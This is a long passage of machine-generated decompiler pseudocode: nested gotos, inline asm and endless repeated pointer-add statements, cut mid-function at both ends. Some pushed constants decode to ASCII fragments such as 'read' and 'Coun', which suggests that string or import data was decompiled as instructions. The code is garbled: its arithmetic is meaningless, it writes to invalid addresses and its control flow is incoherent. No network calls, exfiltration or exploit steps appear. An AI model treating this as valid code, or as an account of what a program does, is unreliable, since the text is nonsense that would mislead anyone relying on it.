                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												_t250 =  *_t125;
                                                                          												if(_t250 == 0) {
                                                                          													L187:
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													_t126 = _t125 + 1;
                                                                          													 *_t126 =  *_t126 + _t149;
                                                                          													_t125 = _t126 + 1;
                                                                          													asm("bound esi, [cs:ebx+0x73]");
                                                                          													L188:
                                                                          													asm("bound esi, [ebx+0x73]");
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													_push(_t156);
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													asm("pushad");
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													L189:
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													 *_t125 =  *_t125 + 0x40;
                                                                          													 *_t152 =  *_t152 >> 0x65;
                                                                          													asm("popad");
                                                                          													if( *_t152 == 0) {
                                                                          														L194:
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t149 =  *_t149 ^ _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														L192:
                                                                          														 *_t149 =  *_t149 + _t149;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														L193:
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *(_t125 + 0x2e) =  *(_t125 + 0x2e) ^ _t125;
                                                                          														_pop(es);
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *((intOrPtr*)(_t125 + 0x8000000)) =  *((intOrPtr*)(_t125 + 0x8000000)) + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t152 =  *_t152 + _t149;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														_t127 = _t125 + 1;
                                                                          														 *_t127 =  *_t127 + _t149;
                                                                          														 *_t152 =  *_t152 >> 0x72;
                                                                          														asm("gs insb");
                                                                          														asm("outsd");
                                                                          														asm("arpl [eax], ax");
                                                                          														_t125 = _t127 + _t133;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t149 =  *_t149 + _t125;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														 *_t152 = _t133 +  *_t152;
                                                                          														 *_t125 =  *_t125 + _t125;
                                                                          														goto L194;
                                                                          													}
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													asm("pushad");
                                                                          													_t128 = _t125 +  *_t125;
                                                                          													 *_t128 =  *_t128 + _t128;
                                                                          													if ( *_t128 < 0) goto L191;
                                                                          													 *_t128 =  *_t128 + _t128;
                                                                          													_t125 = _t128;
                                                                          													 *_t125 =  *_t125 + _t125;
                                                                          													goto L192;
                                                                          												}
                                                                          												if(_t250 < 0) {
                                                                          													goto L188;
                                                                          												}
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t152 =  *_t152 + _t140;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t149;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t140;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *((intOrPtr*)(_t125 + _t125)) =  *((intOrPtr*)(_t125 + _t125)) + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												_push(_t125);
                                                                          												asm("pushad");
                                                                          												asm("popad");
                                                                          												if( *_t125 == 0) {
                                                                          													goto L189;
                                                                          												}
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *((intOrPtr*)(_t125 + _t125)) =  *((intOrPtr*)(_t125 + _t125)) + _t149;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												_t129 = _t125 + 1;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t149 =  *_t149 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *((intOrPtr*)(_t129 + _t129)) =  *((intOrPtr*)(_t129 + _t129)) + _t140;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												 *_t129 =  *_t129 + _t129;
                                                                          												_t125 = 0;
                                                                          												if(0 < 0) {
                                                                          													goto L193;
                                                                          												}
                                                                          												asm("popad");
                                                                          												if(0 == 0) {
                                                                          													goto L193;
                                                                          												}
                                                                          												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
                                                                          												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + 0xfffffffffffffffd;
                                                                          												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + _t149;
                                                                          												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + 0xfffffffffffffffd;
                                                                          												_t125 = 0xfffffffffffffffd;
                                                                          												 *((intOrPtr*)(0xfffffffffffffffd)) =  *((intOrPtr*)(0xfffffffffffffffd)) + 0xfffffffffffffffd;
                                                                          												 *[cs:eax] =  *[cs:eax] + 0xfffffffffffffffd;
                                                                          												goto L187;
                                                                          											}
                                                                          											if(_t234 != 0) {
                                                                          												goto L179;
                                                                          											}
                                                                          											asm("fs outsd");
                                                                          											if (_t234 > 0) goto L178;
                                                                          											asm("outsb");
                                                                          										}
                                                                          										_t136 = _t136 + 1;
                                                                          										 *_t107 =  *_t107 + _t107;
                                                                          										asm("loopne 0x2");
                                                                          										L142:
                                                                          										 *_t107 =  *_t107 + _t107;
                                                                          										_t107 =  *0x1000072;
                                                                          										L143:
                                                                          										_push(_t150);
                                                                          										_push(_t133);
                                                                          										_t136 = _t136 + 1;
                                                                          										_t228 = _t136;
                                                                          										_push(_t133);
                                                                          										if(_t228 == 0) {
                                                                          											_t155 =  *(_t153 + 0x74) * 0;
                                                                          											 *_t107 =  *_t107 + _t107;
                                                                          											 *_t107 =  *_t107 + _t107;
                                                                          											 *0x561b1e0a =  *0x561b1e0a + _t136;
                                                                          											asm("aas");
                                                                          											_push(cs);
                                                                          											_t142 = _t136 &  *_t150 &  *_t151;
                                                                          											L168:
                                                                          											_push(cs);
                                                                          											asm("lock imul eax, [eax+esi*8], 0x54f00138");
                                                                          											L169:
                                                                          											_t107 = 0x17 +  *(_t107 + _t151 * 8) * 0x54f00138;
                                                                          											asm("lock xor [edx], eax");
                                                                          											L170:
                                                                          											 *_t148 =  *_t148 ^ _t107;
                                                                          											_t143 =  *_t107;
                                                                          											 *_t107 = _t142;
                                                                          											 *_t107 =  *_t107 | _t143;
                                                                          											 *_t107 =  *_t107 | _t143;
                                                                          											_t144 = _t143 |  *_t133;
                                                                          											 *_t107 =  *_t107 | _t144;
                                                                          											 *_t107 =  *_t107 | _t144;
                                                                          											 *_t107 =  *_t107 | _t144;
                                                                          											asm("lock inc esi");
                                                                          											_t136 = (_t144 |  *_t133) +  *_t107;
                                                                          											L172:
                                                                          											asm("das");
                                                                          											asm("outsb");
                                                                          											asm("outsb");
                                                                          											_t107 = _t107 - 0x16 +  *_t136;
                                                                          											 *_t151 =  *_t151 ^ _t148;
                                                                          											_t260 = _t260 *  *_t107;
                                                                          											L173:
                                                                          											 *_t107 =  *_t107 | _t136;
                                                                          											 *_t107 =  *_t107 | _t136;
                                                                          											L174:
                                                                          											 *_t107 =  *_t107 | _t136;
                                                                          											_t146 = _t136 |  *_t133;
                                                                          											asm("lock cmp [edx], eax");
                                                                          											L175:
                                                                          											asm("lock test dword [eax], 0xa13081e");
                                                                          											L176:
                                                                          											_push(ds);
                                                                          											 *_t133 =  *_t133 | _t148;
                                                                          											_t148 = _t148 |  *_t133;
                                                                          											_t136 = _t146 |  *_t146;
                                                                          											 *_t107 =  *_t107 | _t148;
                                                                          											_t151 = _t151 + 1;
                                                                          											 *_t107 =  *_t107 | _t136;
                                                                          											asm("rcr dword [ebx+0x4e], cl");
                                                                          											goto L177;
                                                                          										}
                                                                          										if(_t228 < 0) {
                                                                          											goto L169;
                                                                          										}
                                                                          										if(_t228 != 0) {
                                                                          											goto L168;
                                                                          										}
                                                                          										 *_t136 =  *_t136 + _t107;
                                                                          										asm("popad");
                                                                          										asm("arpl [ebx+0x65], sp");
                                                                          										if( *_t136 < 0) {
                                                                          											goto L170;
                                                                          										}
                                                                          										 *_t136 =  *_t136 + _t107;
                                                                          										asm("bound ebp, [ecx+0x6e]");
                                                                          										 *[fs:ecx] =  *[fs:ecx] + _t107;
                                                                          										_t230 =  *[fs:ecx];
                                                                          										asm("arpl [edi+ebp*2+0x73], bp");
                                                                          										if (_t230 >= 0) goto L171;
                                                                          										L148:
                                                                          										asm("outsd");
                                                                          									}
                                                                          									L115:
                                                                          									 *_t136 =  *_t136 + _t107;
                                                                          									asm("o16 arpl [edi+ebp*2+0x73], bp");
                                                                          									L116:
                                                                          									asm("arpl [edi+ebp*2+0x73], bp");
                                                                          									L117:
                                                                          									if(_t211 >= 0) {
                                                                          										L137:
                                                                          										_t61 =  &(_t150[0x1c]);
                                                                          										 *_t61 = _t150[0x1c] + _t151;
                                                                          										_t225 =  *_t61;
                                                                          									}
                                                                          									 *_t136 =  *_t136 + _t107;
                                                                          									asm("o16 insb");
                                                                          									if( *_t136 != 0) {
                                                                          										goto L143;
                                                                          									}
                                                                          									_push(0x6f660100);
                                                                          									L120:
                                                                          									_t42 = _t151 + 0x6f;
                                                                          									 *_t42 =  *((intOrPtr*)(_t151 + 0x6f)) + _t155;
                                                                          									if( *_t42 < 0) {
                                                                          										goto L142;
                                                                          									}
                                                                          									L121:
                                                                          									asm("outsb");
                                                                          									 *_t136 =  *_t136 + _t107;
                                                                          									asm("o16 jo 0x75");
                                                                          									_t153 =  *(_t151 + 0x74) * 0x66010066;
                                                                          									L122:
                                                                          									 *_t136 =  *_t136 + _t107;
                                                                          									asm("o16 jb 0x68");
                                                                          									L123:
                                                                          									 *[gs:ecx] =  *[gs:ecx] + _t107;
                                                                          								}
                                                                          								L83:
                                                                          								_t133 = _t133 - 1;
                                                                          								if (_t133 >= 0) goto L84;
                                                                          								_t29 = _t148 + 0x65;
                                                                          								 *_t29 =  *(_t148 + 0x65) + _t148;
                                                                          								_t200 =  *_t29;
                                                                          								asm("a16 inc ebx");
                                                                          								if(_t200 < 0) {
                                                                          									goto L115;
                                                                          								}
                                                                          								asm("popad");
                                                                          								if(_t200 == 0) {
                                                                          									goto L116;
                                                                          								}
                                                                          								_t133 = _t133 - 1;
                                                                          								_t201 = _t133;
                                                                          								if(_t201 >= 0) {
                                                                          									L108:
                                                                          									if(_t207 < 0) {
                                                                          										L133:
                                                                          										 *_t107 =  *_t107 + _t107;
                                                                          										_t148 = _t148 + _t136;
                                                                          										 *_t107 =  *_t107 + _t107;
                                                                          										 *((intOrPtr*)(_t148 + _t151 * 2)) =  *((intOrPtr*)(_t148 + _t151 * 2)) + _t107;
                                                                          										 *_t136 =  *_t136 + _t107;
                                                                          										_pop(_t150);
                                                                          										_t151 =  *(_t150 + 0x61 + _t153 * 2) * 0xd50000;
                                                                          										L135:
                                                                          										 *_t107 =  *_t107 + _t107;
                                                                          										asm("aad 0x0");
                                                                          										 *_t107 =  *_t107 + _t107;
                                                                          										_t223 =  *_t107;
                                                                          										_t60 = _t107;
                                                                          										_t107 = _t155;
                                                                          										_t155 = _t60;
                                                                          										if (_t223 < 0) goto L136;
                                                                          										 *_t136 =  *_t136 + _t107;
                                                                          										goto L137;
                                                                          									}
                                                                          									if (_t207 == 0) goto L110;
                                                                          									L110:
                                                                          									_t37 =  &(_t150[0x19]);
                                                                          									 *_t37 = _t133 + _t150[0x19];
                                                                          									if( *_t37 < 0) {
                                                                          										goto L135;
                                                                          									}
                                                                          									asm("outsb");
                                                                          									asm("outsd");
                                                                          									 *_t136 =  *_t136 + _t107;
                                                                          									L112:
                                                                          									_t150[0x1a] = _t133 + _t150[0x1a];
                                                                          									goto L113;
                                                                          								}
                                                                          								if(_t201 < 0) {
                                                                          									L106:
                                                                          									asm("outsd");
                                                                          									asm("outsb");
                                                                          									goto L108;
                                                                          								}
                                                                          								 *_t136 =  *_t136 + _t107;
                                                                          								_push(_t148);
                                                                          								asm("a16 dec edi");
                                                                          								L89:
                                                                          								if(_t201 < 0) {
                                                                          									goto L120;
                                                                          								}
                                                                          								asm("outsb");
                                                                          								_t133 = _t133 - 1;
                                                                          								_t202 = _t133;
                                                                          								if(_t202 >= 0) {
                                                                          									goto L114;
                                                                          								}
                                                                          								if(_t202 < 0) {
                                                                          									goto L112;
                                                                          								}
                                                                          								 *_t136 =  *_t136 + _t107;
                                                                          								L93:
                                                                          								_t31 = _t148 + 0x65;
                                                                          								 *_t31 =  *(_t148 + 0x65) + _t148;
                                                                          								_t204 =  *_t31;
                                                                          								asm("a16 push ecx");
                                                                          								if(_t204 != 0) {
                                                                          									goto L122;
                                                                          								}
                                                                          								if(_t204 < 0) {
                                                                          									L126:
                                                                          									 *_t136 =  *_t136 + _t107;
                                                                          									L127:
                                                                          									_t49 = _t153 + 0x65;
                                                                          									 *_t49 =  *(_t153 + 0x65) + _t153;
                                                                          									_t218 =  *_t49;
                                                                          									asm("insd");
                                                                          									if(_t218 >= 0) {
                                                                          										goto L148;
                                                                          									}
                                                                          									if (_t218 == 0) goto L129;
                                                                          									 *((intOrPtr*)(_t148 + 0x61)) =  *((intOrPtr*)(_t148 + 0x61)) + _t151;
                                                                          									asm("outsb");
                                                                          									 *[fs:ecx] =  *[fs:ecx] + _t107;
                                                                          									if( *[fs:ecx] >= 0) {
                                                                          										L154:
                                                                          										if(_t230 >= 0) {
                                                                          											goto L173;
                                                                          										}
                                                                          										asm("popad");
                                                                          										asm("insd");
                                                                          										 *[gs:ecx] =  *[gs:ecx] + _t107;
                                                                          										_t231 =  *[gs:ecx];
                                                                          										_push(0x736e6f74);
                                                                          										L156:
                                                                          										asm("outsd");
                                                                          										asm("outsb");
                                                                          										if (_t231 >= 0) goto L157;
                                                                          										_t66 = _t136 + 0x73 + _t153 * 2;
                                                                          										 *_t66 =  *((intOrPtr*)(_t136 + 0x73 + _t153 * 2)) + _t153;
                                                                          										if( *_t66 == 0) {
                                                                          											goto L175;
                                                                          										}
                                                                          										asm("outsb");
                                                                          										 *_t136 =  *_t136 + _t107;
                                                                          										if( *_t136 < 0) {
                                                                          											goto L176;
                                                                          										}
                                                                          										asm("arpl [esi], si");
                                                                          										_t133[0x19] = _t133[0x19] + _t151;
                                                                          										asm("outsb");
                                                                          										 *[fs:ecx] =  *[fs:ecx] + _t107;
                                                                          										_t234 =  *[fs:ecx];
                                                                          										goto L160;
                                                                          									}
                                                                          									asm("popad");
                                                                          									asm("outsb");
                                                                          									 *[fs:ecx] =  *[fs:ecx] + _t107;
                                                                          									_t220 =  *[fs:ecx];
                                                                          									if(_t220 >= 0) {
                                                                          										goto L156;
                                                                          									}
                                                                          									if(_t220 < 0) {
                                                                          										if(_t230 == 0) {
                                                                          											goto L172;
                                                                          										}
                                                                          										asm("outsd");
                                                                          										if(_t230 >= 0) {
                                                                          											goto L174;
                                                                          										}
                                                                          										asm("bound edi, [ecx+0x6e]");
                                                                          										goto L154;
                                                                          									}
                                                                          									asm("popad");
                                                                          									if (_t220 == 0) goto L134;
                                                                          									goto L133;
                                                                          								}
                                                                          								_push(_t151);
                                                                          								asm("popad");
                                                                          								asm("insb");
                                                                          								L96:
                                                                          								if(_t204 != 0) {
                                                                          									 *((intOrPtr*)(_t153 + 0x61)) =  *((intOrPtr*)(_t153 + 0x61)) + _t153;
                                                                          									asm("insb");
                                                                          									asm("insb");
                                                                          									asm("outsd");
                                                                          									asm("arpl [eax], ax");
                                                                          									 *(_t153 + 0x65) =  *(_t153 + 0x65) + _t153;
                                                                          									asm("insd");
                                                                          									asm("arpl [eax+0x79], si");
                                                                          									goto L126;
                                                                          								}
                                                                          								L97:
                                                                          								_t153 = _t153 + 1;
                                                                          								_t205 = _t153;
                                                                          								if(_t205 < 0) {
                                                                          									goto L117;
                                                                          								}
                                                                          								 *_t136 =  *_t136 + _t107;
                                                                          								_push(_t148);
                                                                          								asm("a16 push ebx");
                                                                          								L99:
                                                                          								asm("a16 push ebx");
                                                                          								if(_t205 == 0) {
                                                                          									goto L123;
                                                                          								}
                                                                          								asm("popad");
                                                                          								asm("insb");
                                                                          								if(_t205 != 0) {
                                                                          									goto L127;
                                                                          								}
                                                                          								_t153 = _t153 + 1;
                                                                          								_t206 = _t153;
                                                                          								L102:
                                                                          								if(_t206 < 0) {
                                                                          									goto L121;
                                                                          								}
                                                                          								 *_t107 =  *_t107 + _t107;
                                                                          								asm("retf 0x0");
                                                                          								L104:
                                                                          								 *_t107 =  *_t107 + _t107;
                                                                          								 *((intOrPtr*)(_t107 + 0x72)) =  *((intOrPtr*)(_t107 + 0x72)) + _t148;
                                                                          								 *_t107 =  *_t107 + _t107;
                                                                          								_t35 =  &(_t150[0x17]);
                                                                          								 *_t35 = _t133 + _t150[0x17];
                                                                          								_t207 =  *_t35;
                                                                          								asm("fs insb");
                                                                          								asm("insb");
                                                                          								goto L106;
                                                                          							}
                                                                          							 *[gs:ecx] =  *[gs:ecx] + _t107;
                                                                          							_push(_t133);
                                                                          							if ( *[gs:ecx] == 0) goto L71;
                                                                          							L56:
                                                                          							_t153 = _t153 + 1;
                                                                          							_t188 = _t153;
                                                                          						}
                                                                          						 *_t136 =  *_t136 + _t107;
                                                                          						_t150 =  &(_t150[0]);
                                                                          						_t178 = _t150;
                                                                          						if(_t178 == 0) {
                                                                          							L61:
                                                                          							_t151 = _t151 + 1;
                                                                          							_t190 = _t151;
                                                                          						}
                                                                          						asm("gs insd");
                                                                          						L41:
                                                                          						asm("insd");
                                                                          						if(_t178 < 0) {
                                                                          							L59:
                                                                          							if(_t188 < 0) {
                                                                          								if(_t195 < 0) {
                                                                          									goto L102;
                                                                          								}
                                                                          								asm("insd");
                                                                          								if(_t195 < 0) {
                                                                          									goto L93;
                                                                          								}
                                                                          								 *_t136 =  *_t136 + _t107;
                                                                          								_t196 =  *_t136;
                                                                          								asm("insb");
                                                                          								if(_t196 >= 0) {
                                                                          									goto L110;
                                                                          								}
                                                                          								if (_t196 < 0) goto L107;
                                                                          								L80:
                                                                          								asm("insb");
                                                                          							}
                                                                          							asm("outsd");
                                                                          							 *[gs:ecx] =  *[gs:ecx] + _t107;
                                                                          							_push(_t133);
                                                                          							if ( *[gs:ecx] == 0) goto L77;
                                                                          							goto L61;
                                                                          						}
                                                                          						L42:
                                                                          						_t153 =  *(_t153 + 0x4e) * 0x41656d61;
                                                                          						 *_t136 =  *_t136 + _t107;
                                                                          						_t150 =  &(_t150[0]);
                                                                          						_t179 = _t150;
                                                                          						if(_t179 == 0) {
                                                                          							L65:
                                                                          							asm("insb");
                                                                          							if (_t191 < 0) goto L66;
                                                                          							_t150[0x18] = _t150[0x18] + _t148;
                                                                          							_t151 =  *(_t151 + 0x6f + _t107 * 2) * 0x6e695372;
                                                                          							_t192 = _t151;
                                                                          							L67:
                                                                          							_t153 =  *(_t151 + 0x67) * 0x624f656c;
                                                                          							_push(0x65);
                                                                          							asm("arpl [eax+eax+0x1], si");
                                                                          							L68:
                                                                          							_push(_t150);
                                                                          							if(_t192 < 0) {
                                                                          								goto L97;
                                                                          							}
                                                                          							if(_t192 == 0) {
                                                                          								goto L96;
                                                                          							}
                                                                          							_t151 = _t151 + 1;
                                                                          							_t153 =  *_t153 * 0x74736c01;
                                                                          							_t193 = _t153;
                                                                          							asm("insb");
                                                                          							if(_t193 >= 0) {
                                                                          								goto L104;
                                                                          							}
                                                                          							if(_t193 < 0) {
                                                                          								goto L99;
                                                                          							}
                                                                          							asm("popad");
                                                                          							if(_t193 == 0) {
                                                                          								goto L89;
                                                                          							}
                                                                          							 *_t136 =  *_t136 + _t107;
                                                                          							L75:
                                                                          							_t23 = _t133 + 0x74 + _t151 * 2;
                                                                          							 *_t23 =  *((intOrPtr*)(_t133 + 0x74 + _t151 * 2)) + _t153;
                                                                          							_t195 =  *_t23;
                                                                          						}
                                                                          						asm("gs insd");
                                                                          						if(_t179 < 0) {
                                                                          							goto L65;
                                                                          						}
                                                                          						asm("popad");
                                                                          						if(_t179 == 0) {
                                                                          							goto L68;
                                                                          						}
                                                                          						L45:
                                                                          						_t136 = _t136 + 1;
                                                                          						 *_t136 =  *_t136 + _t107;
                                                                          						L46:
                                                                          						_t9 =  &(_t150[0x19]);
                                                                          						 *_t9 = _t150[0x19] + _t107;
                                                                          						if( *_t9 == 0) {
                                                                          							goto L67;
                                                                          						}
                                                                          						_t155 = _t133[0x1a] * 0x6e756f43;
                                                                          						L48:
                                                                          						_t133 =  &(_t133[0]);
                                                                          						_t183 = _t133;
                                                                          						asm("outsd");
                                                                          						if(_t183 != 0) {
                                                                          							goto L75;
                                                                          						}
                                                                          						if (_t183 == 0) goto L50;
                                                                          						L50:
                                                                          						_t150[0x1b] = _t150[0x1b] + _t107;
                                                                          						L51:
                                                                          						asm("insb");
                                                                          						asm("outsd");
                                                                          						asm("bound esp, [ecx+0x6c]");
                                                                          						_t136 = _t136 + 1;
                                                                          						asm("insb");
                                                                          						asm("insb");
                                                                          						asm("outsd");
                                                                          						asm("arpl [eax], ax");
                                                                          						_t150[0x1b] = _t150[0x1b] + _t107;
                                                                          						L52:
                                                                          						_t150 =  &(_t150[0]);
                                                                          						asm("insb");
                                                                          						asm("outsd");
                                                                          						asm("bound esp, [ecx+0x6c]");
                                                                          						goto L53;
                                                                          					}
                                                                          					if(_t168 == 0) {
                                                                          						goto L48;
                                                                          					}
                                                                          					asm("insd");
                                                                          					_t151 = _t151 - 1;
                                                                          					asm("popad");
                                                                          					L20:
                                                                          					asm("insd");
                                                                          					_t136 = _t136 + 1;
                                                                          					 *_t136 =  *_t136 + _t107;
                                                                          					_t150 =  &(_t150[0]);
                                                                          					_t169 = _t150;
                                                                          					if(_t169 == 0) {
                                                                          						goto L42;
                                                                          					}
                                                                          					if(_t169 < 0) {
                                                                          						goto L51;
                                                                          					}
                                                                          					if(_t169 <= 0) {
                                                                          						goto L50;
                                                                          					}
                                                                          					_push(_t155);
                                                                          					if(_t169 >= 0) {
                                                                          						goto L52;
                                                                          					}
                                                                          					L24:
                                                                          					_t147 = _t136 + 1;
                                                                          					L25:
                                                                          					_t136 = _t147 + 1;
                                                                          					 *_t136 =  *_t136 + _t107;
                                                                          					_t150 =  &(_t150[0]);
                                                                          					_t171 = _t150;
                                                                          					if(_t171 == 0) {
                                                                          						goto L46;
                                                                          					}
                                                                          					L26:
                                                                          					asm("popad");
                                                                          					if(_t171 >= 0) {
                                                                          						goto L56;
                                                                          					}
                                                                          					_t153 = _t153 + 1;
                                                                          					_t172 = _t153;
                                                                          					if(_t172 < 0) {
                                                                          						if(_t188 < 0) {
                                                                          							goto L83;
                                                                          						}
                                                                          						asm("outsd");
                                                                          						goto L59;
                                                                          					}
                                                                          					L28:
                                                                          					asm("outsd");
                                                                          					if (_t172 < 0) goto L29;
                                                                          					_t4 =  &(_t150[0x19]);
                                                                          					 *_t4 = _t150[0x19] + _t107;
                                                                          					if( *_t4 == 0) {
                                                                          						goto L50;
                                                                          					}
                                                                          					asm("outsd");
                                                                          					asm("arpl [ecx+0x6c], sp");
                                                                          					L31:
                                                                          					asm("insb");
                                                                          					_push(_t155);
                                                                          					_t153 =  *(_t153 + 0x65) * 0x65470100;
                                                                          					L32:
                                                                          					asm("insd");
                                                                          					 *[gs:ecx] =  *[gs:ecx] + _t107;
                                                                          					L33:
                                                                          					_t150 =  &(_t150[0]);
                                                                          					_t176 = _t150;
                                                                          					if(_t176 == 0) {
                                                                          						goto L54;
                                                                          					}
                                                                          					if(_t176 >= 0) {
                                                                          						if(_t190 >= 0) {
                                                                          							goto L80;
                                                                          						}
                                                                          						 *_t136 =  *_t136 + _t107;
                                                                          						_t191 =  *_t136;
                                                                          						_push(_t133);
                                                                          						goto L65;
                                                                          					}
                                                                          					if(_t176 == 0) {
                                                                          						goto L61;
                                                                          					}
                                                                          					asm("insd");
                                                                          					L37:
                                                                          					_t155 = _t155 + 1;
                                                                          					_t151 =  *(_t148 + 0x65) * 0x726f7463;
                                                                          					_t177 = _t151;
                                                                          					goto L38;
                                                                          				}
                                                                          				asm("insd");
                                                                          				_t136 = _t136 + 1;
                                                                          				 *_t136 =  *_t136;
                                                                          				_t133 =  &(_t133[0]);
                                                                          				asm("insb");
                                                                          				asm("outsd");
                                                                          				if(_t133 >= 0) {
                                                                          					L16:
                                                                          					if (_t168 == 0) goto L38;
                                                                          					goto L17;
                                                                          				}
                                                                          				_t107 = 0xffffffffffffffff;
                                                                          				asm("popad");
                                                                          				asm("outsb");
                                                                          				asm("fs insb");
                                                                          				 *[gs:ecx] =  *[gs:ecx];
                                                                          				_t133 =  &(_t133[0]);
                                                                          				asm("outsd");
                                                                          				if(_t133 < 0) {
                                                                          					goto L26;
                                                                          				}
                                                                          				_t151 = _t151 + 1;
                                                                          				_t153 =  *(_t153 + 0x41) * 0x72430100;
                                                                          				asm("popad");
                                                                          				if(_t153 == 0) {
                                                                          					goto L25;
                                                                          				}
                                                                          				_t151 = _t151 + 1;
                                                                          				_t153 =  *(_t153 + 0x41) * 0x72430100;
                                                                          				asm("popad");
                                                                          				if(_t153 == 0) {
                                                                          					goto L28;
                                                                          				}
                                                                          				_t153 = _t153 - 1;
                                                                          				_t163 = _t153;
                                                                          				if(_t163 != 0) {
                                                                          					goto L33;
                                                                          				}
                                                                          				if(_t163 < 0) {
                                                                          					goto L20;
                                                                          				}
                                                                          				 *_t136 =  *_t136;
                                                                          				_t133 =  &(_t133[0]);
                                                                          				_t164 = _t133;
                                                                          				if(_t164 < 0) {
                                                                          					goto L31;
                                                                          				}
                                                                          				asm("popad");
                                                                          				if(_t164 == 0) {
                                                                          					goto L32;
                                                                          				}
                                                                          				_push(0xffffffffffffffff);
                                                                          				if(_t164 < 0) {
                                                                          					goto L37;
                                                                          				}
                                                                          				asm("arpl [ebp+0x73], sp");
                                                                          				if(_t164 >= 0) {
                                                                          					goto L24;
                                                                          				}
                                                                          				 *_t136 =  *_t136;
                                                                          				_t133 =  &(_t133[0]);
                                                                          				_t165 = _t133;
                                                                          				if(_t165 < 0) {
                                                                          					goto L37;
                                                                          				}
                                                                          				asm("popad");
                                                                          				if(_t165 == 0) {
                                                                          					goto L38;
                                                                          				}
                                                                          				_push(_t155);
                                                                          				_push(0x64616572);
                                                                          				 *_t136 =  *_t136;
                                                                          				_t155 = _t155 + 1;
                                                                          				asm("gs insb");
                                                                          				if( *_t136 == 0) {
                                                                          					goto L41;
                                                                          				}
